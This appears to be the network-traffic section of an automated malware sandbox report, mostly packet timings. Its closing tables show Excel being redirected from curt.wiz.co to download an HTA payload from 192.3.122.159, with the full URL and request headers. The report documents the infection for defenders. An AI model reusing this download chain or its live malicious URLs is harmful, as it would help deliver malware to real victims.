            Dec 16, 2024 10:06:24.055442095 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.055486917 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.055494070 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.055525064 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.055563927 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.066373110 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.066401005 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.066446066 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.066452026 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.066503048 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.076786995 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.076811075 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.076885939 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.076891899 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.076908112 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.076987982 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.085402012 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.085423946 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.085551977 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.085558891 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.085817099 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.094758987 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.094777107 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.094945908 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.094952106 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.095021009 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.104722977 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.104767084 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.104789972 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.104799986 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.104841948 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.104851961 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.114619970 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.114639044 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.114684105 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.114696980 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.114727020 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.114795923 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.237521887 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.237546921 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.237653017 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.237653017 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.237667084 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.237706900 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.238591909 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.238667011 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.238742113 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.238789082 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.238789082 CET49729443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:24.238801003 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:24.238809109 CET4434972913.107.246.63192.168.2.25
            Dec 16, 2024 10:06:58.479078054 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:58.479161978 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:06:58.479238033 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:58.480226040 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:06:58.480237961 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.195024014 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.195106983 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.197670937 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.197694063 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.197959900 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.198715925 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.239334106 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.716654062 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.716723919 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.716767073 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.716803074 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.716814041 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.716860056 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.895416021 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.895505905 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.895540953 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.895570040 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.895586967 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.895611048 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.953701973 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.953769922 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.953794003 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.953819990 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:00.953839064 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:00.953856945 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.072398901 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.072431087 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.072561979 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.072588921 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.072624922 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.101210117 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.101242065 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.101315975 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.101345062 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.101362944 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.101428032 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.123421907 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.123450994 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.123493910 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.123523951 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.123539925 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.123579979 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.144217968 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.144246101 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.144295931 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.144321918 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.144335985 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.144398928 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.252583027 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.252613068 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.252665043 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.252691984 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.252712965 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.252729893 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.269777060 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.269797087 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.269862890 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.269889116 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.269937992 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.283276081 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.283325911 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.283354998 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.283379078 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.283409119 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.283426046 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.298119068 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.298211098 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.298212051 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.298242092 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.298288107 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.298288107 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.309314966 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.309369087 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.309391975 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.309452057 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.309463024 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.309498072 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.319905996 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.319962978 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.320010900 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.320030928 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.320064068 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.320084095 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.331202984 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.331274986 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.331310034 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.331338882 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.331356049 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.331377029 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.439745903 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.439779043 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.439841986 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.439867973 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.439907074 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.447988987 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.448018074 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.448084116 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.448111057 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.448165894 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.457103014 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.457129955 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.457212925 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.457232952 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.457243919 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.457473040 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.465404987 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.465430021 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.465488911 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.465509892 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.465548038 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.472790956 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.472810984 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.472881079 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.472899914 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.472939014 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.481892109 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.481908083 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.481969118 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.481987953 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.482047081 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.489275932 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.489294052 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.489355087 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.489375114 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.489453077 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.627808094 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.627876997 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.627902985 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.627928019 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.627963066 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.627994061 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.634123087 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.634172916 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.634195089 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.634213924 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.634234905 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.634254932 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.641695023 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.641715050 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.641778946 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.641801119 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.641829967 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.641843081 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.648938894 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.648984909 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.649023056 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.649040937 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.649068117 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.649087906 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.655565977 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.655610085 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.655638933 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.655657053 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.655679941 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.655700922 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.663958073 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.664005041 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.664028883 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.664047956 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.664072037 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.664092064 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.670720100 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.670763016 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.670789957 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.670804977 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.670828104 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.670845032 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.678611994 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.678657055 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.678705931 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.678723097 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.678735971 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.678757906 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.819375038 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.819448948 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.819468975 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.819498062 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.819523096 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.819684029 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.825818062 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.825869083 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.825901985 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.825926065 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.825941086 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.825961113 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.833688021 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.833741903 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.833762884 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.833782911 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.833796978 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.833815098 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.840450048 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.840497971 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.840522051 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.840539932 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.840553999 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.840569019 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.848160028 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.848205090 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.848228931 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.848247051 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.848263025 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.848311901 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.855524063 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.855571032 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.855596066 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.855613947 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.855628967 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.855649948 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.863442898 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.863495111 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.863523006 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.863538980 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.863550901 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.863569021 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.870193005 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.870294094 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.870322943 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.870338917 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:01.870367050 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:01.870387077 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.010963917 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.010994911 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.011070013 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.011101007 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.011154890 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.016949892 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.016971111 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.017015934 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.017035007 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.017074108 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.024815083 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.024838924 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.024889946 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.024907112 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.024964094 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.032591105 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.032608986 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.032663107 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.032680035 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.032716036 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.040591002 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.040637016 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.040673971 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.040693998 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.040707111 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.040869951 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.047871113 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.047921896 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.047952890 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.047976971 CET4434974713.107.246.63192.168.2.25
            Dec 16, 2024 10:07:02.047990084 CET49747443192.168.2.2513.107.246.63
            Dec 16, 2024 10:07:02.048196077 CET49747443192.168.2.2513.107.246.63
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Dec 16, 2024 10:06:18.274678946 CET | 59482 | 53 | 192.168.2.25 | 1.1.1.1
            Dec 16, 2024 10:06:18.689383030 CET | 53 | 59482 | 1.1.1.1 | 192.168.2.25
            Dec 16, 2024 10:06:44.423249960 CET | 59482 | 53 | 192.168.2.25 | 1.1.1.1

            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
            Dec 16, 2024 10:06:18.274678946 CET | 192.168.2.25 | 1.1.1.1 | 0x28ac | Standard query (0) | curt.wiz.co | A (IP address) | IN (0x0001) | false
            Dec 16, 2024 10:06:44.423249960 CET | 192.168.2.25 | 1.1.1.1 | 0x2057 | Standard query (0) | assets.msn.com | A (IP address) | IN (0x0001) | false

            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
            Dec 16, 2024 10:06:18.689383030 CET | 1.1.1.1 | 192.168.2.25 | 0x28ac | No error (0) | curt.wiz.co | curt.wiz.co.cdn.gocache.net | | CNAME (Canonical name) | IN (0x0001) | false
            Dec 16, 2024 10:06:18.689383030 CET | 1.1.1.1 | 192.168.2.25 | 0x28ac | No error (0) | curt.wiz.co.cdn.gocache.net | | 170.82.173.30 | A (IP address) | IN (0x0001) | false
            Dec 16, 2024 10:06:18.689383030 CET | 1.1.1.1 | 192.168.2.25 | 0x28ac | No error (0) | curt.wiz.co.cdn.gocache.net | | 170.82.174.30 | A (IP address) | IN (0x0001) | false
            Dec 16, 2024 10:06:44.560652018 CET | 1.1.1.1 | 192.168.2.25 | 0x2057 | No error (0) | assets.msn.com | assets.msn.com.edgekey.net | | CNAME (Canonical name) | IN (0x0001) | false
            • curt.wiz.co
            • otelrules.svc.static.microsoft
            • 192.3.122.159
            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.25 | 49730 | 192.3.122.159 | 80 | 2696 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            Dec 16, 2024 10:06:21.469419956 CET | 276 | OUT | GET /121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Connection: Keep-Alive
            Host: 192.3.122.159
            Dec 16, 2024 10:06:22.577073097 CET | 1236 | IN | HTTP/1.1 200 OK
            Date: Mon, 16 Dec 2024 09:06:22 GMT
            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
            Last-Modified: Sun, 15 Dec 2024 15:01:35 GMT
            ETag: "24127-62950571107a0"
            Accept-Ranges: bytes
            Content-Length: 147751
            Keep-Alive: timeout=5, max=100
            Connection: Keep-Alive
            Content-Type: application/hta


            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
            0 | 192.168.2.25 | 49724 | 170.82.173.30 | 443 | 2696 | C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
            Timestamp | Bytes transferred | Direction | Data
            2024-12-16 09:06:20 UTC | 245 | OUT | GET /SEyYcvw9Ev?&timeline=adorable&female HTTP/1.1
            Accept: */*
            UA-CPU: AMD64
            Accept-Encoding: gzip, deflate
            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
            Host: curt.wiz.co
            Connection: Keep-Alive
            2024-12-16 09:06:21 UTC | 983 | IN | HTTP/1.1 302 Found
            Date: Mon, 16 Dec 2024 09:06:21 GMT
            Content-Type: text/plain; charset=utf-8
            Content-Length: 108
            Connection: close
            Set-Cookie: sess=123; path=/; Secure; HttpOnly
            Location: http://192.3.122.159/121/vfc/clearentirethingwithbestnoticetheeverythinggooodfrome.hta
            Strict-Transport-Security: max-age=31536000; includeSubDomains
            x-ms-middleware-request-id: 00000000-0000-0000-0000-000000000000
            X-DNS-Prefetch-Control: off
            X-Frame-Options: SAMEORIGIN
            X-Download-Options: noopen
            X-Content-Type-Options: nosniff
            X-XSS-Protection: 1; mode=block
            Content-Security-Policy: default-src 'self' 'unsafe-inline' ; font-src *;img-src * data:; script-src * 'unsafe-inline' ; style-src * 'unsafe-inline';
            Referrer-Policy: strict-origin
            Permissions-Policy: accelerometer=(self), ambient-light-sensor=(), battery=(self), camera=(self), geolocation=(self), gyroscope=(self), microphone=(self), usb=(self), gamepad=(), speaker-selection=()
            X-GoCache-CacheStatus: BYPASS
